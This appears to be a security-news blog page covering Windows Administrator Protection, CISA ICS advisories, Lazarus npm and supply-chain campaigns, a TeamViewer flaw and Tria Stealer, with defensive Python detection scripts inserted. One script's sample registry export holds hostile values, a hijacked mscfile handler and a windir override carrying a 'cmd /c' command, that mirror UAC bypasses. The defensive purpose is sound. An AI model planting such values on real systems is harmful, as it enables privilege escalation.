Tuesday, February 11, 2025

Microsoft Enhances Windows 11 Security with Admin Protection to Prevent Crowdstrike-Like Incident


Microsoft has introduced “Administrator Protection” (AP), a Windows 11 security feature that changes how administrative privileges are granted and held, with the aim of reducing the risk of privilege escalation attacks.

Detailed in a Microsoft technical blog post, the feature is intended to close weaknesses rooted in the legacy split-token administrator design.

Key Principles of Administrator Protection

Administrator Protection is built on five foundational principles designed to tighten security boundaries while maintaining usability.

It enforces the Principle of Least Privilege, ensures administrative privileges persist only for active tasks, and establishes strict separation between elevated and non-elevated user contexts.

Elevation must be deliberate, and applications can request granular, task-specific elevation rather than relying on the broad, upfront elevation model of User Account Control (UAC).

Figure: error dialog

Among the transformative changes, System Managed Administrator Accounts (SMAA) play a central role.

Each SMAA is a separate local administrator account created for, and linked to, a standard user account; elevated work runs in that account rather than under the user's own token.

SMAAs are created without a password and with strict logon constraints: logon is mediated by the system, which validates the requesting process against an allowlist, so the account cannot be used for an ordinary interactive or network logon.

Addressing Legacy Vulnerabilities

Microsoft’s approach directly addresses long-standing weaknesses in the previous split-token administrator model.

Because the elevated and non-elevated tokens shared the same user profile, a medium-integrity process could tamper with per-user registry keys and files that auto-elevated programs later trusted, and so bypass UAC.

Classic bypasses, such as hijacking the HKCU file-association keys read by Event Viewer (eventvwr.exe) or planting a per-user environment variable that a scheduled task expands, are rendered ineffective because the standard and elevated contexts now have separate user profiles and no longer share a registry hive.
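The two bypass families named above leave artifacts in the current user's hive, which is exactly what a defender can hunt for on systems that do not yet run Administrator Protection. The following is an added example, not Microsoft's code: it parses a registry export in .reg text format (a constructed sample is embedded, so it runs on any OS) and flags the Event Viewer `mscfile` handler key, the analogous `ms-settings` handler used by fodhelper.exe (a further instance of the same pattern, not named in the article), and per-user overrides of `windir`/`systemroot`. The choice of which values count as suspicious is this script's own assumption.

```python
"""Hunt for the per-user registry artifacts of the classic UAC bypasses.

Added example; not Microsoft's code. It parses a registry export in .reg text
format rather than the live registry, so it runs anywhere. On a real host you
would feed it the output of
    reg export "HKCU\\Software\\Classes" classes.reg
    reg export "HKCU\\Environment" env.reg
"""
import re

# Per-user keys that a medium-integrity process may write and that an
# auto-elevated binary used to read. mscfile is the Event Viewer case from the
# article; ms-settings (fodhelper.exe) is a further instance of the same pattern.
WATCHED_KEYS = {
    r"hkey_current_user\software\classes\mscfile\shell\open\command":
        "mscfile handler hijack (eventvwr.exe auto-elevation)",
    r"hkey_current_user\software\classes\ms-settings\shell\open\command":
        "ms-settings handler hijack (fodhelper.exe auto-elevation)",
}
# Per-user overrides of system variables that an elevated scheduled task whose
# action path starts with %windir% or %systemroot% would expand.
WATCHED_ENV = {"windir", "systemroot"}

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<val>.*)$|^@=(?P<default>.*)$')


def find_uac_bypass_artifacts(reg_text: str) -> list:
    """Return one finding per suspicious value found in a .reg export."""
    findings = []
    current_key = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key_match = KEY_RE.match(line)
        if key_match:
            current_key = key_match.group("key").lower()   # registry keys are case-insensitive
            continue
        if not current_key or not line or line.startswith(";"):
            continue
        val_match = VALUE_RE.match(line)
        if not val_match:
            continue
        name = val_match.group("name") or "(Default)"
        data = val_match.group("val") if val_match.group("name") else val_match.group("default")
        if current_key in WATCHED_KEYS:
            findings.append({"key": current_key, "value_name": name, "data": data,
                             "reason": WATCHED_KEYS[current_key]})
        elif current_key == r"hkey_current_user\environment" and name.lower() in WATCHED_ENV:
            findings.append({"key": current_key, "value_name": name, "data": data,
                             "reason": "per-user override of a system environment variable"})
    return findings


# Constructed sample export: a hijacked mscfile handler plus a planted per-user
# windir, next to a harmless Path entry.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command]
@="C:\\Users\\alice\\AppData\\Local\\Temp\\payload.exe"

[HKEY_CURRENT_USER\Environment]
"Path"="C:\\Users\\alice\\bin"
"windir"="cmd /c C:\\Users\\alice\\AppData\\Local\\Temp\\p.bat &"
"""

if __name__ == "__main__":
    for hit in find_uac_bypass_artifacts(SAMPLE_REG):
        print(f"{hit['key']} [{hit['value_name']}] = {hit['data']}  <- {hit['reason']}")
```

On a host with Administrator Protection enabled these keys still exist, but the elevated context no longer reads the standard user's hive, which is why the article describes the technique as defeated rather than merely detected.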

Administrator Protection also discontinues the auto-elevation that Windows 7 introduced for selected Microsoft binaries, which had quietly expanded the attack surface.

Microsoft counts 92 auto-elevating COM interfaces, 11 DLL hijacking opportunities and 23 auto-elevating applications that this removal mitigates.

Despite the trade-off in user convenience, this shift substantially reduces the risk of privilege escalation by requiring explicit consent through Windows Hello or other credential-based mechanisms for elevation.

Beyond security, AP aims to enhance user experience by eliminating dead-end pathways that previously rendered essential functionalities inaccessible to standard users.

For instance, tools like the Group Policy Editor (gpedit.exe), which were unusable when launched by standard users, can now leverage AP’s structured elevation pathways for seamless functionality.

Figure: gpedit.exe in an error state

However, challenges remain. Microsoft acknowledges that specific attack vectors, including token manipulation and DLL hijacking in insecure paths, still require attention.

While mitigated significantly, these vulnerabilities highlight the need for continuous updates to close emerging gaps.

Administrator Protection is a substantial change to the Windows privilege model.

Although the feature requires adjustment from users accustomed to auto-elevation workflows, its benefit in blocking privilege escalation outweighs the inconvenience.

Microsoft has asked developers to test and update their applications for compatibility with AP, and has signalled that it intends to make the feature the default in a future release.

For security-conscious users, Administrator Protection offers a markedly stronger boundary between standard and elevated work, and Microsoft is soliciting feedback for further refinement.


CISA Releases Seven ICS Advisories to Strengthen Cybersecurity Posture


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued seven Industrial Control Systems (ICS) advisories, highlighting critical vulnerabilities in systems vital to industrial and operational processes.

These advisories aim to enhance awareness and encourage mitigation strategies to maintain the security and integrity of ICS environments. Below, we delve into the details of each advisory and its associated vulnerabilities.


1. B&R Automation Runtime (ICSA-25-028-01)

  • CVE: CVE-2024-8603
  • Vulnerability: Use of a Broken or Risky Cryptographic Algorithm

Remote exploitation of this vulnerability could allow attackers to impersonate legitimate services on impacted devices.  

The vulnerability results from the use of unsafe cryptographic algorithms in the SSL/TLS component. If exploited, attackers could potentially intercept or manipulate communications between devices.

2. Schneider Electric Power Logic (ICSA-25-028-02)

  • CVEs: CVE-2024-10497, CVE-2024-10498
  • Vulnerabilities: Authorization Bypass Through User-Controlled Key, Improper Restriction of Operations within the Bounds of a Memory Buffer

Exploitation of these vulnerabilities could lead to unauthorized data modifications or denial of service (DoS) affecting device web interfaces.

 The flawed implementation of user-controlled keys (CVE-2024-10497) could allow attackers to manipulate configurations outside defined privileges.

Additionally, memory buffer issues (CVE-2024-10498) enable attackers to send malformed requests, potentially causing system malfunctions.

3. Rockwell Automation FactoryTalk (ICSA-25-028-03)

  • CVEs: CVE-2025-24479, CVE-2025-24480
  • Vulnerabilities: Incorrect Authorization, OS Command Injection

Attackers exploiting these flaws could execute commands with elevated privileges, severely impacting system integrity.

 Improper authorization configurations (CVE-2025-24479) and failure to sanitize inputs (CVE-2025-24480) allow attackers to inject malicious OS commands, leading to code execution and system compromise.

4. Rockwell Automation FactoryTalk View Site Edition (ICSA-25-028-04)

  • CVEs: CVE-2025-24481, CVE-2025-24482
  • Vulnerabilities: Incorrect Permission Assignment for Critical Resources, Code Injection

Exploitation could result in unauthorized access to configuration files and the execution of malicious code.  

Unauthorized permissions (CVE-2025-24481) and vulnerabilities enabling DLL injection (CVE-2025-24482) pose significant risks to system configuration and security.

5. Rockwell Automation DataMosaix Private Cloud (ICSA-25-028-05)

  • CVEs: CVE-2020-11656, CVE-2024-11932
  • Vulnerabilities: Exposure of Sensitive Information, Third-Party Dependency Issues

Sensitive data exposure and vulnerabilities in third-party components could allow attackers to overwrite files and execute malicious actions.  

A path traversal vulnerability (CVE-2024-11932) and an outdated SQLite component (CVE-2020-11656) give attackers ways to overwrite files and compromise reports and user projects.

6. Schneider Electric RemoteConnect and SCADAPack x70 Utilities (ICSA-25-028-06)

  • CVE: CVE-2024-12703
  • Vulnerability: Deserialization of Untrusted Data

Malicious project files opened by users could compromise system confidentiality, integrity, or even lead to remote code execution.

Improper deserialization processes allow attackers to embed malicious code in project files, compromising workstation security.

7. BD Diagnostic Solutions Products (ICSMA-24-352-01)

  • CVE: CVE-2024-10476
  • Vulnerability: Use of Default Credentials

Default credentials used in BD products could allow unauthorized access, modification, or deletion of sensitive data, potentially shutting down systems.  

Default credentials (CWE-1392) pose a significant risk, enabling attackers to infiltrate systems and access protected health and personally identifiable information (PHI/PII).

CISA’s release of these advisories underscores the urgent need for industrial organizations to address vulnerabilities in ICS environments.

Organizations are encouraged to follow CISA’s mitigation recommendations, including implementing patches, enforcing secure configurations, and regularly updating software.

By proactively addressing these vulnerabilities, organizations can bolster their cybersecurity posture and protect critical infrastructure from malicious threats.


Lazarus Group Drop Malicious NPM Packages in Developers Systems Remotely


Socket researchers have identified a malicious npm package named postcss-optimizer and attributed it to the North Korean state-sponsored Lazarus Group.

Based on code-level similarities with earlier campaigns, the package is linked to the Contagious Interview subgroup of Lazarus, which targets software developers with fake job interviews that deliver malware.

The package borrows the name of the legitimate and widely used postcss library (over 16 billion downloads) and had been downloaded 477 times at the time of analysis.

Once installed, it deploys BeaverTail malware, which serves dual purposes as an infostealer and a malware loader.

Its second-stage payload is suspected to be InvisibleFerret, a potent backdoor that aligns with Lazarus’ software supply chain exploitation tactics.

As of publication, the package remained available on the npm registry, though Socket had requested its removal.

Sophisticated Techniques Exploit Supply Chains

The “postcss-optimizer” package was published under the npm registry alias “yolorabbit” and relies on the name of the original postcss library to appear legitimate.

Figure: screenshot of the legitimate postcss package on the npm registry.

Unit 42 previously documented the same tactic, with activity dating back to 2022, in which the group used staged job-interview processes to lure developers into installing malicious npm packages.

On installation, these packages run a staged attack: reconnaissance, establishing persistence, and then exfiltrating data or deploying secondary payloads.

The BeaverTail malware associated with this campaign employs obfuscation techniques, such as variable renaming and control flow flattening, to evade static analysis.

Once activated, the malware targets systems across Windows, macOS, and Linux.

It collects sensitive data, including credentials, browser cookies, and cryptocurrency wallet files, sending them to a hardcoded command-and-control (C2) server.

Additionally, BeaverTail facilitates long-term persistence through registry key manipulation or startup script injections, regularly fetching and executing additional payloads.

Financial Targeting

A detailed analysis of the malware revealed its focus on data theft, particularly targeting cryptocurrency wallets and financial credentials.

The malware scans for browser extensions associated with wallets like MetaMask and Phantom while also exfiltrating Solana wallet keys and macOS login keychain data.

It systematically searches user directories for locally stored credentials and transmits the stolen data to its C2 infrastructure using HTTP POST requests.

The code also includes a fallback mechanism to download additional payloads using alternate methods like cURL, ensuring resilience against network restrictions.

These capabilities align with Lazarus’ preference for financial theft coupled with broader espionage goals.

This incident underlines the persistent threat posed by APT groups exploiting open-source ecosystems for malware distribution.

Organizations must adopt robust measures to secure their software supply chains.

Proactive techniques such as automated dependency audits, behavior-based analysis tools, and real-time monitoring for suspicious npm packages can help mitigate risks.

Tools like the Socket GitHub integration and CLI add layers of defense by flagging anomalies in open-source packages before deployment.
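The postcss-optimizer case combines three signals that a dependency audit can compute without running the package: a name that is a popular package plus a suffix (or a one- or two-character typo of one), an install-time lifecycle script, and a negligible download count. The following is an added example, not Socket's tooling: it scores the dependencies of a package.json against those signals. The package metadata and the popularity list are constructed for the example; in practice you would pull them from the npm registry. It also covers plain typosquats (the `axois` entry), which the article does not discuss but which the same check catches.

```python
"""Flag dependencies that look like the postcss-optimizer case.

Added example, not Socket's tooling. Inputs are constructed; a real audit would
fetch package metadata and download counts from the npm registry.
"""
import re
from typing import Optional

POPULAR = {"postcss", "react", "lodash", "express", "axios"}  # constructed allowlist
SUFFIX_RE = re.compile(r"^(?P<base>[a-z0-9.-]+?)[-_.](optimizer|utils|helper|core|plugin|cli|lite|pro)$")
INSTALL_HOOKS = ("preinstall", "install", "postinstall")  # run automatically by npm install


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name: str, popular: set) -> Optional[str]:
    """Return the popular package this name imitates, or None."""
    if name in popular:
        return None
    m = SUFFIX_RE.match(name)
    if m and m.group("base") in popular:
        return m.group("base")
    for p in popular:
        if abs(len(p) - len(name)) <= 2 and levenshtein(name, p) <= 2:
            return p
    return None


def audit_dependencies(package_json: dict, registry_meta: dict, popular: set = POPULAR,
                       min_weekly_downloads: int = 1000) -> list:
    """Score each dependency; a higher score means more signals, so review it first."""
    findings = []
    for name in package_json.get("dependencies", {}):
        meta = registry_meta.get(name, {})
        reasons = []
        base = lookalike_of(name, popular)
        if base:
            reasons.append(f"name resembles popular package '{base}'")
        hooks = [h for h in INSTALL_HOOKS if h in meta.get("scripts", {})]
        if hooks:
            reasons.append("runs install hook: " + ", ".join(hooks))
        if meta.get("weekly_downloads", 0) < min_weekly_downloads:
            reasons.append("low download count")
        if reasons:
            findings.append({"package": name, "score": len(reasons), "reasons": reasons})
    return sorted(findings, key=lambda f: -f["score"])


# Constructed inputs: the real postcss, the lookalike, a typosquat of axios, and lodash.
PACKAGE_JSON = {"dependencies": {"postcss": "^8.4.0", "postcss-optimizer": "^1.0.0",
                                 "axois": "^1.0.0", "lodash": "^4.17.0"}}
REGISTRY_META = {
    "postcss": {"scripts": {}, "weekly_downloads": 100_000_000},
    "postcss-optimizer": {"scripts": {"postinstall": "node index.js"}, "weekly_downloads": 40},
    "axois": {"scripts": {}, "weekly_downloads": 10},
    "lodash": {"scripts": {}, "weekly_downloads": 50_000_000},
}

if __name__ == "__main__":
    for f in audit_dependencies(PACKAGE_JSON, REGISTRY_META):
        print(f"{f['package']}: score {f['score']} -> {'; '.join(f['reasons'])}")
```

An install hook on its own is common in legitimate native packages, which is why the score combines it with the name and download signals rather than blocking on any single one.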

The postcss-optimizer campaign serves as a stark reminder of how malicious actors exploit developer trust and open-source tools to infiltrate systems.

Vigilance, combined with advanced security tooling, remains critical to countering such sophisticated software supply chain threats.


Lazarus Hackers Tamper with Software Packages to Gain Backdoor Access to the Victims Device


A recent investigation conducted by STRIKE, a division of SecurityScorecard, has unveiled the intricate and far-reaching operation of the Lazarus Group, a North Korean advanced persistent threat (APT) group.

Dubbed “Operation Phantom Circuit,” the campaign highlights a deliberate and sophisticated effort to infiltrate global systems through compromised software supply chains and advanced Command-and-Control (C2) infrastructure.

The operation primarily targeted developers and the cryptocurrency sector, with critical data being siphoned back to Pyongyang.

The investigation revealed that Lazarus employed multiple C2 servers, which became active in September 2024 and featured an additional hidden operational layer.

The servers housed a React-based web-admin interface integrated with Node.js APIs, enabling centralized control.

Through these interfaces, attackers could systematically manage exfiltrated data, oversee infected systems, and execute payload delivery.

This consistent design was evident across all analyzed C2 servers, suggesting a high degree of operational maturity and standardization.

Supply Chain Intrusion and Global Impact

Lazarus exploited legitimate software packages by embedding obfuscated backdoors, tricking developers into deploying compromised applications.

These supply chain attacks targeted a broad audience, especially in the cryptocurrency domain, leading to the execution of malicious payloads on host systems.

STRIKE’s analysis identified hundreds of victims across multiple campaigns, with data traces pointing back to Lazarus’s infrastructure in North Korea.

The operation, which spanned from November 2024 to January 2025, utilized obfuscation tactics and layered infrastructure to evade detection.

Key elements of the infrastructure included Astrill VPN exit nodes, intermediate proxies registered to Russian entities, and C2 servers listening on ports such as 1224 and 1245.

NetFlow analysis and connection logs allowed STRIKE to confidently trace these activities back to North Korean IPs, including the limited range of addresses assigned to Pyongyang.
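The two C2 ports and the beacon-like traffic patterns are the cheapest indicators in this report for a defender to act on. The following is an added example, not STRIKE's tooling: it reads NetFlow-style records (a constructed CSV sample is embedded), counts TCP flows from each internal host to each destination on ports 1224 and 1245, and reports destinations a host contacted repeatedly together with the mean gap between flows, which is what a beacon looks like. The port list comes from the report; the threshold and the CSV layout are this script's assumptions.

```python
"""Triage NetFlow-style records for repeated connections to the reported C2 ports.

Added example, not STRIKE's tooling. The CSV layout, the minimum flow count and
the sample records are constructed for the example.
"""
import csv
import io
from collections import defaultdict

C2_PORTS = {1224, 1245}  # ports named in the Operation Phantom Circuit report


def suspicious_c2_flows(netflow_csv: str, ports=C2_PORTS, min_flows: int = 3) -> dict:
    """Map each source host to the (dst, port) pairs it hit at least min_flows times."""
    seen = defaultdict(list)  # (src, dst, dport) -> timestamps of matching flows
    for row in csv.DictReader(io.StringIO(netflow_csv)):
        dport = int(row["dport"])
        if dport in ports and row["proto"].upper() == "TCP":
            seen[(row["src"], row["dst"], dport)].append(int(row["ts"]))
    report = defaultdict(list)
    for (src, dst, dport), stamps in seen.items():
        if len(stamps) < min_flows:
            continue
        stamps.sort()
        # Mean spacing between flows; a near-constant value suggests a beacon.
        mean_gap = (stamps[-1] - stamps[0]) / (len(stamps) - 1)
        report[src].append({"dst": dst, "dport": dport, "flows": len(stamps),
                            "mean_interval_s": mean_gap})
    return dict(report)


# Constructed sample: host .5 beacons to one server every 300 s on 1224,
# host .12 contacts another on 1245, host .9 only does ordinary HTTPS, and
# one UDP row on 1245 is present to show that the filter is TCP-only.
SAMPLE_NETFLOW = """ts,src,dst,proto,dport,bytes
1000,10.0.0.5,203.0.113.7,TCP,1224,812
1050,10.0.0.9,198.51.100.2,TCP,443,4120
1300,10.0.0.5,203.0.113.7,TCP,1224,790
1310,10.0.0.9,198.51.100.2,TCP,443,3980
1600,10.0.0.5,203.0.113.7,TCP,1224,805
1620,10.0.0.12,203.0.113.9,TCP,1245,1500
1700,10.0.0.5,203.0.113.7,UDP,1245,120
1900,10.0.0.5,203.0.113.7,TCP,1224,811
1920,10.0.0.12,203.0.113.9,TCP,1245,1490
2220,10.0.0.12,203.0.113.9,TCP,1245,1510
2300,10.0.0.9,198.51.100.2,TCP,443,4050
"""

if __name__ == "__main__":
    for host, hits in suspicious_c2_flows(SAMPLE_NETFLOW).items():
        for h in hits:
            print(f"{host} -> {h['dst']}:{h['dport']}: {h['flows']} flows, "
                  f"every ~{h['mean_interval_s']:.0f}s")
```

Port numbers alone are a weak indicator, since the operators can change them; the repetition and regular spacing are what make a tuple worth pivoting on in the rest of the flow data.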

Advanced Obfuscation Techniques

Lazarus’s operations epitomized strategic obfuscation. Traffic was anonymized through VPNs and proxies, blending malicious activity with legitimate network traffic to complicate detection.

For example, traffic initiated from Pyongyang was routed through Astrill VPN exit points and subsequently masked via intermediate proxies in Russia.

The C2 servers, hosted on infrastructure provided by entities like Stark Industries, were used to exfiltrate sensitive data, including credentials and system information.

Key findings include the use of a hidden web-admin panel on C2 servers, accessible only through a secured login.

This panel provided attackers with granular control over exfiltrated data, displaying victim details and facilitating data manipulation through custom-built interfaces.

The group also used commercial services such as Dropbox for data transfer, which blends exfiltration into ordinary cloud traffic and makes it harder to spot.

The findings from Operation Phantom Circuit underscore the urgent need for intensified cybersecurity measures, particularly in the software supply chain.

Organizations are advised to implement rigorous code signing and verification processes, enhance monitoring of network traffic, and deploy proactive defenses against evolving tactics employed by APT groups like Lazarus.

With 233 victims identified globally in the campaign’s latest phase, including a significant concentration in India and Brazil, the operation is a stark reminder of what a well-resourced actor can do through the software supply chain.

Industries, especially those handling sensitive or financial data, must prioritize collaborative threat intelligence sharing and adopt advanced detection tools to counter such persistent threats.


TeamViewer Clients Vulnerability Leads to Privilege Escalation


TeamViewer, a widely used remote access product, has disclosed a high-severity vulnerability in its Windows clients.

The company announced on January 28, 2025 that the software is affected by a flaw that could allow local attackers to escalate privileges.

The vulnerability, tracked as CVE-2025-0065, has a Common Vulnerability Scoring System (CVSS) score of 7.8, placing it in the “High” severity range.

Details of CVE-2025-0065: Improper Neutralization of Argument Delimiters

The vulnerability resides in the TeamViewer_service.exe component of TeamViewer Full Client and Host on Windows systems.

It is classified as CWE-88: Improper Neutralization of Argument Delimiters in a Command (‘Argument Injection’).

An attacker with local, unprivileged access to a Windows system could exploit the flaw by passing crafted arguments containing unneutralized delimiters to the service component, ultimately gaining elevated privileges.

While this vulnerability does not allow for remote exploitation, it poses a significant risk in shared or multi-user environments, such as corporate networks or publicly accessible systems.

Fortunately, TeamViewer confirmed that, to date, there is no evidence that this vulnerability has been exploited in the wild.

Affected Products and Versions

The vulnerability impacts a range of TeamViewer products for Windows, including:

  • TeamViewer Full Client (Windows): Versions earlier than 15.62, 14.7.48799, 13.2.36226, 12.0.259319, and 11.0.259318.
  • TeamViewer Host (Windows): Versions earlier than 15.62, 14.7.48799, 13.2.36226, 12.0.259319, and 11.0.259318.
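The fix levels above are per branch, so a naive "is it older than 15.62" check would wrongly flag every supported 11.x to 14.x install and wrongly clear a 15.x build below 15.62. The following is an added example, not TeamViewer's code: it compares an installed version against the fixed version for its own major branch and runs the check over a constructed host inventory. How unsupported branches are treated (older than 11 is assumed vulnerable, newer than 15 assumed fixed) and the inventory format are assumptions of this script.

```python
"""Check TeamViewer for Windows versions against the CVE-2025-0065 fix levels.

Added example, not TeamViewer's code. The fixed versions are the ones in the
advisory above; inventory format and handling of unlisted branches are assumptions.
"""

# Major branch -> first fixed version on that branch (from the advisory).
FIXED_VERSIONS = {
    15: (15, 62),
    14: (14, 7, 48799),
    13: (13, 2, 36226),
    12: (12, 0, 259319),
    11: (11, 0, 259318),
}
OLDEST_FIXED_BRANCH = min(FIXED_VERSIONS)


def parse_version(version: str) -> tuple:
    """'15.61.5' -> (15, 61, 5); tuples compare component-wise."""
    return tuple(int(part) for part in version.strip().split("."))


def is_vulnerable_cve_2025_0065(version: str) -> bool:
    """True when a Full Client/Host version predates its branch's fixed build.

    Branches older than 11 have no fixed build in the advisory, so they are
    treated as vulnerable (assumption); branches newer than 15 are treated as
    fixed, since 15.62 is the oldest fixed release of the current line.
    """
    v = parse_version(version)
    fixed = FIXED_VERSIONS.get(v[0])
    if fixed is None:
        return v[0] < OLDEST_FIXED_BRANCH
    return v < fixed   # e.g. (15, 61, 5) < (15, 62); (13, 2, 36226, 1) is not < (13, 2, 36226)


def hosts_needing_update(inventory: dict) -> list:
    """inventory: hostname -> installed version. Returns the hosts to patch, sorted."""
    return sorted(host for host, ver in inventory.items() if is_vulnerable_cve_2025_0065(ver))


# Constructed inventory covering each branch boundary.
INVENTORY = {
    "ws-01": "15.61.5",
    "ws-02": "15.62",
    "kiosk-7": "14.7.48798",
    "kiosk-8": "14.7.48799",
    "legacy-1": "10.0.45862",
    "srv-3": "13.2.36226.1",
}

if __name__ == "__main__":
    for host in hosts_needing_update(INVENTORY):
        print(f"{host}: TeamViewer {INVENTORY[host]} is vulnerable to CVE-2025-0065")
```

The same branch-aware comparison applies to any vendor that ships fixes to several maintained lines at once; collapsing it to a single "latest version" check is a common source of both false positives and missed hosts.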

Users running any of these older versions are strongly urged to upgrade immediately.

TeamViewer has released fixed builds for every supported branch; 15.62 is the current release. The company recommends that users update to the latest available version as soon as possible.

Updated versions can be downloaded from TeamViewer’s official website. For organizations managing multiple installations, TeamViewer Tensor customers are advised to prioritize these updates across their systems to prevent potential exploitation.

The vulnerability was identified by an anonymous contributor working with Trend Micro Zero Day Initiative and responsibly disclosed to TeamViewer.

This collaboration highlights the importance of coordinated disclosure efforts in maintaining software security. TeamViewer’s proactive approach to addressing the vulnerability underscores its commitment to ensuring the safety of its users. 

TeamViewer users are advised to stay informed about security updates and implement best practices, such as restricting physical access to devices and monitoring privilege use, to further mitigate risks.


Tria Stealer Malware Exploits Android Devices to Harvest SMS Data


Cybersecurity researchers have uncovered a sophisticated Android malware campaign known as “Tria Stealer,” which is targeting users in Malaysia and Brunei to collect sensitive information such as SMS data, call logs, WhatsApp messages, and emails.

The malware campaign, which has been active since March 2024, uses wedding invitations as a lure to trick victims into downloading malicious apps.

This campaign showcases the growing sophistication of Android threats, as well as the potential risks of data breaches and account hijacking.

How Tria Stealer Operates

The Tria Stealer malware disguises itself as a legitimate Android app, often themed around wedding invitations. Victims are tricked into installing the app by receiving messages via WhatsApp or Telegram, often sent by compromised accounts.

Once installed, the app requests dangerous permissions such as SMS, call-log and network-state access, and presents itself as a system settings app to avoid suspicion.

Upon installation, Tria Stealer collects sensitive information, including SMS messages, call logs, device details, and even messages from apps like WhatsApp and Gmail.

This data is then exfiltrated to the attackers through Telegram bots, which act as Command and Control (C2) servers.

The researchers identified two versions of Tria Stealer, with the second version, released in August 2024, introducing advanced features.

Figure: overview of the Tria Stealer campaign

The malware registers a BroadcastReceiver to monitor incoming SMS messages and calls, which lets it intercept one-time passwords (OTPs) and transaction authorization codes (TACs).

These codes are then used to hijack accounts on platforms such as WhatsApp, Telegram, and banking applications.

Additionally, newer variants of the malware include functionality for stealing data from notifications posted by popular messaging and email apps, including Gmail, WhatsApp Business, and Yahoo Mail.

Figure: stealing data from notifications posted by popular messaging and email apps

The stolen data is repackaged into specific formats and sent to different Telegram bots based on its type, showcasing an organized approach by the threat actors.
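The capabilities described above (SMS and call-log permissions, a high-priority SMS_RECEIVED receiver, a notification listener, a label that imitates Settings) are all visible in the app's manifest before it ever runs. The following is an added example, not the researchers' code: it parses a decoded AndroidManifest.xml (a constructed sample is embedded; on a real APK you would first decode the binary manifest with apktool or androguard) and scores those indicators. The list of imitated labels is this script's assumption, and real manifests usually carry a `@string/...` resource reference as the label that you would resolve first.

```python
"""Static triage of an AndroidManifest.xml for the Tria Stealer pattern.

Added example, not the researchers' code. The sample manifest is constructed
to mirror the behaviour described in the article.
"""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # the android: attribute namespace
SMS_PERMS = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"}
CALL_PERMS = {"android.permission.READ_CALL_LOG", "android.permission.READ_PHONE_STATE"}
NOTIF_LISTENER = "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
SYSTEM_LOOKALIKE_LABELS = {"settings", "system settings", "android system", "google play services"}


def _short(perms):
    return ", ".join(sorted(p.rsplit(".", 1)[1] for p in perms))


def triage_manifest(manifest_xml: str) -> dict:
    """Return the package name, a score and one line per indicator found."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package", "")
    perms = {e.get(A + "name") for e in root.iter("uses-permission")}
    findings = []

    if perms & SMS_PERMS:
        findings.append("SMS permissions: " + _short(perms & SMS_PERMS))
    if perms & CALL_PERMS:
        findings.append("call/phone permissions: " + _short(perms & CALL_PERMS))

    # A receiver on SMS_RECEIVED with a high priority sees the message early,
    # which is how OTP interception works.
    for receiver in root.iter("receiver"):
        for flt in receiver.iter("intent-filter"):
            actions = {a.get(A + "name") for a in flt.iter("action")}
            if SMS_RECEIVED in actions:
                prio = flt.get(A + "priority", "0")
                findings.append(f"SMS_RECEIVED receiver {receiver.get(A + 'name')} (priority {prio})")

    # A service bound with this permission can read every posted notification.
    for service in root.iter("service"):
        if service.get(A + "permission") == NOTIF_LISTENER:
            findings.append(f"notification listener service {service.get(A + 'name')}")

    app = root.find("application")
    label = (app.get(A + "label", "") if app is not None else "").strip().lower()
    if label in SYSTEM_LOOKALIKE_LABELS:
        findings.append(f"label '{label}' imitates a system app")

    return {"package": pkg, "score": len(findings), "findings": findings}


# Constructed manifest; the package name is a placeholder.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.invitation">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <application android:label="Settings" android:icon="@mipmap/ic_settings">
        <receiver android:name=".SmsReceiver" android:exported="true">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <service android:name=".NotifService"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService"/>
            </intent-filter>
        </service>
    </application>
</manifest>
"""

if __name__ == "__main__":
    result = triage_manifest(SAMPLE_MANIFEST)
    print(f"{result['package']}: score {result['score']}")
    for f in result["findings"]:
        print("  -", f)
```

Legitimate messaging apps request some of the same permissions, so the value is in the combination: an app that is not a messenger but registers both an SMS receiver and a notification listener deserves a look regardless of what its label says.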

Consequences of the Attack

Once Tria Stealer compromises accounts, it serves two primary purposes:

  1. Distribution of Malware: The malware sends the malicious app link to the victim’s contacts via group chats and direct messages, tricking more users into downloading it and perpetuating the infection.
  2. Financial Fraud: Impersonating the account owner, attackers request money transfers from the victim’s contacts, often resulting in financial losses.

Experts warn that the stolen information could also be used for other nefarious purposes, such as resetting account passwords, accessing online banking systems, or compromising additional platforms reliant on SMS or email authentication.

Suspected Origin and Target Victims

Investigations suggest that the campaign is orchestrated by an Indonesian-speaking threat actor, evidenced by embedded Indonesian language strings and naming patterns in the malware.

While no individual targeting has been observed, the majority of victims are in Malaysia and Brunei, with Malaysia being the most affected.

A similar malware campaign, UdangaSteal, was active in Southeast Asia in 2023 and early 2024. However, researchers do not attribute Tria Stealer to the same threat actor, as it demonstrates unique code structures, different Telegram bot setups, and enhanced functionality.

Given the rise of such sophisticated malware, cybersecurity experts recommend the following precautions:

  • Avoid Downloading APK Files from Unknown Sources: Only download apps directly from trusted sources like the Google Play Store.
  • Verify Messages Before Clicking: Be cautious of messages requesting app installations, even if they appear to come from friends or trusted contacts.
  • Enable Two-Factor Authentication (2FA): Use 2FA wherever possible to secure your accounts.
